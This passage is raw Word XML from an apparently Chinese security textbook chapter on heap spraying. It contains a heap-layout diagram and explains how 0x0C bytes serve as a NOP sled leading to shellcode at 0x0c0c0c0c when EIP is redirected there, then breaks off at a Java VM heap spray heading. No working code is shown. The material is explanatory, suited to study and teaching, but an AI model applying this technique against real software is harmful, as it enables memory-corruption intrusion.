                      <w:p w14:paraId="1D4450BF" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>已使用内存</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:rect id="矩形 202" o:spid="_x0000_s1136" style="position:absolute;left:2828;top:7964;width:4188;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xAAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8gRvdWMOUqKrqKD0oNCmzf2RfSYx2bdhd2tif323UOhxmJlvmPV2NJ24k/ONZQWLeQKC&#10;uLS64UrB58fx+QWED8gaO8uk4EEetpvJ0xozbQd+p3seKhEh7DNUUIfQZ1L6siaDfm574uhdrTMY&#10;onSV1A6HCDedTJNkKQ02HBdq7OlQU9nmX0aBL/Cy2GszFMXpdv6u3lqXL1ulZtNxtwIRaAz/4b/2&#10;q1aQJin8nolHQG5+AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAP9MRH/EAAAA3AAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" fillcolor="#7f7f7f [1612]" strokecolor="black [3200]" strokeweight="1pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="383FE53B" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00747D3A" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 203" o:spid="_x0000_s1137" style="position:absolute;left:34338;top:1343;width:15678;height:5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587DCB80" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00734F55" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 204" o:spid="_x0000_s1138" style="position:absolute;left:34329;top:19418;width:15635;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mQxAAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8oTe6kYpUqKrqNDiwUIbzf2RfSYx2bdhdzWxv75bKHgcZuYbZrkeTCtu5HxtWcF0koAg&#10;LqyuuVRwOr6/vIHwAVlja5kU3MnDejV6WmKqbc/fdMtCKSKEfYoKqhC6VEpfVGTQT2xHHL2zdQZD&#10;lK6U2mEf4aaVsySZS4M1x4UKO9pVVDTZ1SjwOX5Ot9r0ef5xOfyUX43L5o1Sz+NhswARaAiP8H97&#10;rxXMklf4OxOPgFz9AgAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAB/peZDEAAAA3AAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" fillcolor="#7f7f7f [1612]" strokecolor="black [3200]" strokeweight="1pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="08CC0109" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="004C22B0" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="文本框 205" o:spid="_x0000_s1139" type="#_x0000_t202" style="position:absolute;left:2193;top:1278;width:25540;height:4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OoOxQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8gRvdWOkJaauIoKQgx4alV4f2dckNPs27q4a/71bKPQ4zMw3zHI9mE7cyPnWsoLZNAFB&#10;XFndcq3gdNy9ZiB8QNbYWSYFD/KwXo1elphre+dPupWhFhHCPkcFTQh9LqWvGjLop7Ynjt63dQZD&#10;lK6W2uE9wk0n0yR5lwZbjgsN9rRtqPopr0bBYbsosyJ9uK/FvNiV2WVm99lZqcl42HyACDSE//Bf&#10;u9AK0uQNfs/EIyBXTwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCa8OoOxQAAANwAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="49461270" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00962DDC" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:rPr>
                            <w:sz w:val="28"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                            <w:sz w:val="28"/>
                          </w:rPr>
                          <w:t>堆喷洒（Heap</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="28"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> Spraying</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                            <w:sz w:val="28"/>
                          </w:rPr>
                          <w:t>）之后</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:rect id="矩形 206" o:spid="_x0000_s1140" style="position:absolute;left:34336;top:24204;width:15636;height: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0J8xAAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8gRvdaOHUKKrqKD0oNCmzf2RfSYx2bdhd2tif323UOhxmJlvmPV2NJ24k/ONZQWLeQKC&#10;uLS64UrB58fx+QWED8gaO8uk4EEetpvJ0xozbQd+p3seKhEh7DNUUIfQZ1L6siaDfm574uhdrTMY&#10;onSV1A6HCDedXCZJKg02HBdq7OlQU9nmX0aBL/Cy2GszFMXpdv6u3lqXp61Ss+m4W4EINIb/8F/7&#10;VStYJin8nolHQG5+AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAIB3QnzEAAAA3AAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" fillcolor="#7f7f7f [1612]" strokecolor="black [3200]" strokeweight="1pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="0C224A03" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00A47BED" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 207" o:spid="_x0000_s1141" style="position:absolute;left:34336;top:22895;width:15636;height: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nxAAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8gRvdaMHW6KrqNDiwUIbzf2RfSYx2bdhdzVpf323UPA4zMw3zGozmFbcyfnasoLZNAFB&#10;XFhdc6ngfHp7fgXhA7LG1jIp+CYPm/XoaYWptj1/0T0LpYgQ9ikqqELoUil9UZFBP7UdcfQu1hkM&#10;UbpSaod9hJtWzpNkIQ3WHBcq7GhfUdFkN6PA5/gx22nT5/n79fhTfjYuWzRKTcbDdgki0BAe4f/2&#10;QSuYJy/wdyYeAbn+BQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAO875+fEAAAA3AAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" fillcolor="#7f7f7f [1612]" strokecolor="black [3200]" strokeweight="1pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="70777035" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 208" o:spid="_x0000_s1142" style="position:absolute;left:34338;top:22017;width:15634;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A4wgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/Pa8Iw&#10;FL4P9j+EN/A2k3nQrZoWGRsIysTOg8dH82zLmpeSZG39781hsOPH93tTTLYTA/nQOtbwMlcgiCtn&#10;Wq41nL8/n19BhIhssHNMGm4UoMgfHzaYGTfyiYYy1iKFcMhQQxNjn0kZqoYshrnriRN3dd5iTNDX&#10;0ngcU7jt5EKppbTYcmposKf3hqqf8tdqcMf21m3929dwoNVlf4xqnJYfWs+epu0aRKQp/ov/3Duj&#10;YaHS2nQmHQGZ3wEAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCJlDA4wgAAANwAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" fillcolor="white [3201]" strokecolor="black [3200]" strokeweight="1pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="1661B500" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                            <w:szCs w:val="21"/>
                          </w:rPr>
                          <w:t> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 209" o:spid="_x0000_s1143" style="position:absolute;left:34336;top:20951;width:15634;height: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NYOxAAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8gRvdaMHaaOrqNDiwUIbzf2RfSYx2bdhdzVpf323UPA4zMw3zGozmFbcyfnasoLZNAFB&#10;XFhdc6ngfHp7fgHhA7LG1jIp+CYPm/XoaYWptj1/0T0LpYgQ9ikqqELoUil9UZFBP7UdcfQu1hkM&#10;UbpSaod9hJtWzpNkIQ3WHBcq7GhfUdFkN6PA5/gx22nT5/n79fhTfjYuWzRKTcbDdgki0BAe4f/2&#10;QSuYJ6/wdyYeAbn+BQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAPHo1g7EAAAA3AAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" fillcolor="#7f7f7f [1612]" strokecolor="black [3200]" strokeweight="1pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="10F12625" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 210" o:spid="_x0000_s1144" style="position:absolute;left:2828;top:11802;width:4185;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rjwQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/LisIw&#10;FN0L/kO4gjtNdeGjYxQRB4QRxepilpfmTlumuSlJpq1/P1kILg/nvdn1phYtOV9ZVjCbJiCIc6sr&#10;LhQ87p+TFQgfkDXWlknBkzzstsPBBlNtO75Rm4VCxBD2KSooQ2hSKX1ekkE/tQ1x5H6sMxgidIXU&#10;DrsYbmo5T5KFNFhxbCixoUNJ+W/2ZxTYa/Ws9259ac+0/P66hqTrF0elxqN+/wEiUB/e4pf7pBXM&#10;Z3F+PBOPgNz+AwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAPI7quPBAAAA3AAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" fillcolor="white [3201]" strokecolor="black [3200]" strokeweight="1pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="55021535" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 211" o:spid="_x0000_s1145" style="position:absolute;left:34300;top:6857;width:15672;height:1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sn2wwAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bi8Iw&#10;FITvC/6H8ARv27QFV61GEUGQhR5WPXh8NM+22LyUJGr992ZhYY/DzHzDrDaD6cSDnG8tK8iSFARx&#10;ZXXLtYLzaf85B+EDssbOMil4kYfNevSxwkLbJ//Q4xhqESHsC1TQhNAXUvqqIYM+sT1x9K7WGQxR&#10;ulpqh88IN53M0/RLGmw5LjTY066h6na8GwWzQ1ZOv91uFkqNi0vpjLtdc6Um42G7BBFoCP/hv/ZB&#10;K8izDH7PxCMg128AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA+0bJ9sMAAADcAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" fillcolor="#e7e6e6 [3214]" strokecolor="black [3200]" strokeweight="1pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="7D47EAD7" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="center"/>
                        </w:pPr>
                        <w:r>
                          <w:t>s</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>hellcode</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 212" o:spid="_x0000_s1146" style="position:absolute;left:2828;top:15799;width:4185;height:2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FeBxAAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/BasMw&#10;EETvhfyD2EJujWxD6sSNYoKhYAo+NMkhx8Xa2CbWykhq4v59VSj0OMzMG2ZXzmYUd3J+sKwgXSUg&#10;iFurB+4UnE/vLxsQPiBrHC2Tgm/yUO4XTzsstH3wJ92PoRMRwr5ABX0IUyGlb3sy6Fd2Io7e1TqD&#10;IUrXSe3wEeFmlFmSvEqDA8eFHieqempvxy+jIK/TZv3hqjw0GreXxhl3u2ZKLZ/nwxuIQHP4D/+1&#10;a60gSzP4PROPgNz/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAAuUV4HEAAAA3AAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" fillcolor="#e7e6e6 [3214]" strokecolor="black [3200]" strokeweight="1pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="3CACD369" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="文本框 96" o:spid="_x0000_s1147" type="#_x0000_t202" style="position:absolute;top:25836;width:33381;height:68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14:paraId="57F82613" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                          <w:jc w:val="both"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>地址</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>0</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                          </w:rPr>
                          <w:t>x0C0C0C0C</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>已经包含</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                          </w:rPr>
                          <w:t>Shellcode</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>的可能性非常高</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="65D997E4" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>2</w:t>
                        </w:r>
                        <w:r>
                          <w:t>00×1024×1024=0x0C800000</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>＞0</w:t>
                        </w:r>
                        <w:r>
                          <w:t>x0C0C0C0C</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="连接符: 肘形 214" o:spid="_x0000_s1148" type="#_x0000_t33" style="position:absolute;left:20203;top:11744;width:12706;height:154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foIxAAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;EMXvgt8hzII3TSz+o2sUERRh14PVwx6HZmzLNpPSRK3ffiMseHy8eb83b7nubC3u1PrKsYbxSIEg&#10;zp2puNBwOe+GCxA+IBusHZOGJ3lYr/q9JabGPfhE9ywUIkLYp6ihDKFJpfR5SRb9yDXE0bu61mKI&#10;si2kafER4baWiVIzabHi2FBiQ9uS8t/sZuMbxzxRdPu+POfT5Gv/o8JV1UetBx/d5hNEoC68j//T&#10;B6MhGU/gNSYSQK7+AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhANXl+gjEAAAA3AAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" strokecolor="black [3200]" strokeweight=".5pt">
                  <v:stroke endarrow="block"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="29713601"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hint="eastAsia"/>
        </w:rPr>
        <w:t>图2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">.20 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正常堆布局和堆喷洒之后的堆布局</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773181A7"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1.Heap Spray</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的几种情况</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4147D3D6"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（1）传统的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Heap Spray</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B968F6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传统的Heap Spray是使用JavaScript分配内存。根据Heap Spray的思想，就是用同样的一个指令，去覆盖一片大内存地址，在每块分配到的内存最后，都附加上Shellcode。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A09753B"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对这个指令的要求是，相当于NOPS的作用。且该指令指向的地址，正好落在覆盖的这</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>大片</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内存</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>地址中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E34574"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在实际exploit中就是分配这样的一片内存区域，比如</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EC57FF"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w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24CF76A1" wp14:editId="4606D1A9">
            <wp:extent cx="4062157" cy="1105282"/>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735" cy="1125030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F897D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这样，0x0c0c0c0c的地址的内容也是 0c0c0c0c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E61ADF"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w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EA60BB3" wp14:editId="131B9A90">
            <wp:extent cx="4142480" cy="82291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6444" cy="843563"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A1E24F"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而0c这个指令正好是双字节指令，且对寄存器影响最小，可以起到NOPS的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B73CFEF"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w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25053332" wp14:editId="5389D76F">
            <wp:extent cx="2792318" cy="770526"/>
            <wp:effectExtent l="0" t="0" r="825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3408" cy="801181"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FCD87F"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所以如果把eip指向了0x0c0c0c0c这个地址，就会一直在这片内存中执行下去，一直执行到Shellcode为止。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630A3D5A"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Java VM Heap Spray</w:t>
      </w:r>
    </w:p>
